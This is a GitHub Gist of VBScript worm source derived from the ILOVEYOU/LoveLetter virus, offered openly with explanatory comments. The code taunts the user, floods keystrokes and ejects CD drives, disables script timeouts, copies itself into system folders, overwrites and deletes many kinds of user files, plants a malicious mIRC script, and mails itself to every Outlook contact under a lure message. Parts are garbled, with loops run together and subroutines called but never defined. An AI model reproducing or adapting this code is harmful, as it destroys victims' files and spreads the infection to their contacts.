Created
May 10, 2024 15:28
-
-
Save Red-riot53/e9ad1c74e12e10ff52111de1555ee71a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
x=msgbox("I destroyed your pc Now all files are infected with vbs.worm.win32.fpsgame",0,"From theprotogenwhoaksed UwU") | |
Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow | |
eq = "" | |
ctr = 0 | |
rem Open the current script file and define "vbscopy" which can be used to | |
rem read its own contents. Used to replicate itself in other files. | |
Set fso = CreateObject("Scripting.FileSystemObject") | |
Set file = fso.OpenTextFile(WScript.ScriptFullname, 1) | |
vbscopy = file.ReadAll | |
rem Subroutine to initalize the program | |
rem this line constantly keeps caps lock on | |
Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop | |
rem this makes enter pressed continiusly | |
Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loop | |
Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 100loop | |
Sub main() | |
On Error Resume Next | |
Dim wscr, rr | |
rem Creates a shell which will be used to read the registry. | |
Set wscr = CreateObject("WScript.Shell") | |
rem Gets a registry key which indicates the scripting time-out from Windows. | |
rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") | |
rem Checks if the current timeout is more than 0. | |
If (rr >= 1) Then | |
rem Sets the timeout to 0, effectively making it so that the script won't | |
rem time out, incase the system happens to be too slow to execute it. | |
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD" | |
End If | |
rem Finds special folders, such as system, temporary and windows folders. | |
Set dirwin = fso.GetSpecialFolder(0) | |
Set dirsystem = fso.GetSpecialFolder(1) | |
Set dirtemp = fso.GetSpecialFolder(2) | |
Set c = fso.GetFile(WScript.ScriptFullName) | |
c.Copy(dirsystem & "\MSKernel32.vbs") | |
c.Copy(dirwin & "\Win32DLL.vbs") | |
c.Copy(dirsystem & "\System32") | |
rem Call the other subroutines. | |
regruns() | |
html() | |
spreadtoemail() | |
listadriv() | |
End Sub | |
Sub listadriv() | |
On Error Resume Next | |
Dim d, dc, s | |
Set dc = fso.Drives | |
For Each d In dc | |
If (d.DriveType = 2) Or (d.DriveType = 3) Then | |
folderlist(d.path & "\") | |
End If | |
Next | |
listadriv = s | |
End Sub | |
Sub infectfiles(folderspec) | |
On Error Resume Next | |
Dim f, f1, fc, ext, ap, mircfname, s, bname, mp3 | |
Set f = fso.GetFolder(folderspec) | |
Set fc = f.Files | |
For Each f1 In fc | |
ext = fso.GetExtensionName(f1.path) | |
ext = lcase(ext) | |
s = lcase(f1.name) | |
rem Copies itself into every file with important extensions. | |
If (ext = "bat") Or (ext = "cmd") Or (ext = "exe") Or (ext = "com") Or (ext = "png") Or (ext = "mp4") Or (ext = "7z") Or (ext = "txt") Or (ext = "log") Or (ext = "rar") Then | |
Set ap = fso.OpenTextFile(f1.path, 2, true) | |
ap.write vbscopy | |
ap.close | |
rem Copies itself into every file with js/jse/css/wsh/sct/hta extension | |
rem and creates a copy of the file with the .vbs extension. | |
ElseIf (ext = "js") | |
Or (ext = "jse") | |
Or (ext = "css") | |
Or (ext = "wsh") | |
Or (ext = "sct") | |
Or (ext = "hta") | |
Or (ext = "png") | |
Or (ext = "com") | |
Or (ext = "exe") | |
Or (ext = "bat") | |
Or (ext = "ps1") | |
Or (ext = "dll") | |
Or (ext = "bat") | |
Then | |
Set ap = fso.OpenTextFile(f1.path, 2, true) | |
ap.write vbscopy | |
ap.close | |
bname = fso.GetBaseName(f1.path) | |
Set cop = fso.GetFile(f1.path) | |
cop.copy(folderspec & "\" & bname & ".vbs") | |
fso.DeleteFile(f1.path) | |
rem Copies itself into every file with jpg/jpeg extension | |
rem and creates a copy of the file with the .vbs extension. | |
ElseIf (ext = "jpg") Or (ext = "jpeg") Then | |
rem Copies itself | |
Set ap = fso.OpenTextFile(f1.path, 2, true) | |
ap.write vbscopy | |
ap.close | |
Set cop = fso.GetFile(f1.path) | |
cop.copy(f1.path & ".vbs") | |
fso.DeleteFile(f1.path) | |
rem Copies itself into every file with mp3/mp2 extension. | |
ElseIf (ext = "mp3") Or (ext = "mp2") Then | |
Set mp3 = fso.CreateTextFile(f1.path & ".vbs") | |
mp3.write vbscopy | |
mp3.close | |
Set att = fso.GetFile(f1.path) | |
End If | |
rem Checks if the folder has already been infected, if not it will continue | |
rem to infect the files. | |
If (eq <> folderspec) Then | |
rem Looks for mIRC and related files to determine whether it | |
rem should create/replace its script.ini with a malicious script. | |
If (s = "mirc32.exe") | |
Or (s = "mlink32.exe") | |
Or (s = "mirc.ini") | |
Or (s = "script.ini") | |
Or (s = "mirc.hlp") | |
Then | |
Set scriptini = fso.CreateTextFile(folderspec & "\script.ini") | |
rem The following mIRC script checks if the "nick" of a user is the same | |
rem as "me" to halt and send a DCC command that will send a message to | |
rem the user with a link to the LOVE=LETTER-FOR-YOU html page on the | |
rem system. | |
scriptini.WriteLine "[script]" | |
scriptini.WriteLine ";mIRC Script" | |
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, If mIRC will" | |
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" | |
scriptini.WriteLine ";" | |
scriptini.WriteLine ";Khaled Mardam-Bey" | |
scriptini.WriteLine ";http://www.mirc.com" | |
scriptini.WriteLine ";" | |
scriptini.WriteLine "n0=on 1:JOIN:#:{" | |
scriptini.WriteLine "n1= /If ( $nick == $me ) { halt }" | |
scriptini.WriteLine "n2= /.dcc send $nick" & dirsystem & "\LOVE-LETTER-FOR-YOU.HTM" | |
scriptini.WriteLine "n3=}" | |
scriptini.close | |
eq = folderspec | |
End If | |
End If | |
Next | |
End Sub | |
rem Subroutine used to get file listing of a folder. | |
Sub folderlist(folderspec) | |
On Error Resume Next | |
Dim f, f1, sf | |
Set f = fso.GetFolder(folderspec) | |
Set sf = f.SubFolders | |
rem Iterates over each subfolder from the given top-level folder and | |
rem recursively infect files. | |
For Each f1 In sf | |
infectfiles(f1.path) | |
folderlist(f1.path) | |
Next | |
End Sub | |
rem Subroutine used to create/write registry entries. | |
Sub regcreate(regkey,regvalue) | |
Set regedit = CreateObject("WScript.Shell") | |
regedit.RegWrite regkey, regvalue | |
End Sub | |
rem Subroutine used to get registry entries. | |
Function regget(value) | |
Set regedit = CreateObject("WScript.Shell") | |
regget = regedit.RegRead(value) | |
End Function | |
rem Function to check if a file exists. | |
Function fileexist(filespec) | |
On Error Resume Next | |
Dim msg | |
If (fso.FileExists(filespec)) Then | |
msg = 0 | |
Else | |
msg = 1 | |
End If | |
fileexist = msg | |
End Function | |
rem Function to check if a folder exists. | |
Function folderexist(folderspec) | |
On Error Resume Next | |
Dim msg | |
If (fso.GetFolderExists(folderspec)) Then | |
msg = 0 | |
Else | |
msg = 1 | |
End If | |
fileexist = msg | |
End Function | |
rem Subroutine to send emails to the user's contacts through MAPI | |
rem (Messaging Application Programming Interface), the API used by Outlook to | |
rem communicate with the Microsoft Exchange Server which also hosts calendars | |
rem and address book. | |
Sub spreadtoemail() | |
On Error Resume Next | |
Dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad | |
rem Creates a shell to edit the registry. | |
Set regedit = CreateObject("WScript.Shell") | |
rem Creates a new Outlook application object instance, to access the MAPI. | |
Set out = WScript.CreateObject("Outlook.Application") | |
rem Gets the MAPI namespace used to access the address book lists. | |
Set mapi = out.GetNameSpace("MAPI") | |
rem Goes through all contacts in the address book and sends an email | |
rem with the absolute-zero program as an attachment. | |
For ctrlists = 1 To mapi.AddressLists.Count | |
Set a = mapi.AddressLists(ctrlists) | |
x = 1 | |
rem Gets a registry key that is used to check who has been sent an email, | |
rem already to ensure that even if there may be duplicate contacts, it will | |
rem only send the email once to the same address. | |
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a) | |
If (regv = "") Then | |
regv = 1 | |
End If | |
If (int(a.AddressEntries.Count) > int(regv)) Then | |
rem Iterates over each entry in the address list. | |
For ctrentries = 1 To a.AddressEntries.Count | |
malead = a.AddressEntries(x) | |
regad = "" | |
regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead ) | |
rem If the contact hasn't yet been sent an email, a new email will be | |
rem composed with the virus attached and a "kind" message and the | |
rem subject "ILOVEYOU". | |
If (regad = "") Then | |
Set male = out.CreateItem(0) | |
male.Recipients.Add(malead) | |
male.Subject = "Play my game UwU :3" | |
male.Body = vbcrlf & "please play my game i wrote it in batch :3 also im coming out as a furry to you" | |
male.Attachments.Add(dirsystem & "fpsgame.cmd.vbs") | |
male.Send | |
rem Sets the registry key to indicate that the email has been sent | |
rem to the current contact. | |
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD" | |
End If | |
x = x + 1 | |
Next | |
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count | |
Else | |
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count | |
End If | |
Next | |
Set out = Nothing | |
Set mapi = Nothing | |
End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment